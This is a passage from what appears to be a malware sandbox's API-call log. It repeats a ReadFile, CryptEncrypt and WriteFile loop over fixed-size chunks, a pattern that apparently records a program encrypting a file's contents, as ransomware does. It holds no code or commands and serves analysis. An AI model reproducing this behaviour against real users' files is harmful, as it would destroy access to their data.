lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.101] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.102] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.102] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.102] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.102] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.102] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.102] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.102] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.102] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.103] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.103] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.103] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.103] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.103] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.103] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.103] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.104] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.104] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.104] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.104] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.104] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.104] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.104] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.166] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.166] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.166] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.166] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.175] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.175] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.176] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.176] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.176] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.176] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.176] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.176] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.177] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.177] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.177] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.177] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.177] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.177] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.177] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.178] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.178] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.178] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.178] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.178] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.178] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.178] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.179] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] CryptEncrypt (in: hKey=0x2fc808, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.179] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.179] 